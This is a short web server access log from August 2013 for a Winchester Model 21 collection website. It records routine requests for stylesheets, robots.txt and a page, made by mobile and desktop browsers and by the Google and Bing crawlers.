72.23.74.73 - - [12/Aug/2013:00:16:27 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
66.249.75.117 - - [12/Aug/2013:12:43:25 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.151.148.174 - - [12/Aug/2013:06:55:21 -0400] "GET /robots.txt HTTP/1.1" 200 25 "http://www.winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1)"
157.55.35.115 - - [12/Aug/2013:11:10:54 -0400] "GET /aboutthecollection/special.html HTTP/1.1" 200 39575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
63.87.61.76 - - [12/Aug/2013:22:11:50 -0400] "GET /scripts/13custom.css HTTP/1.1" 200 3162 "http://www.winchestermodel21.com/highprice.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"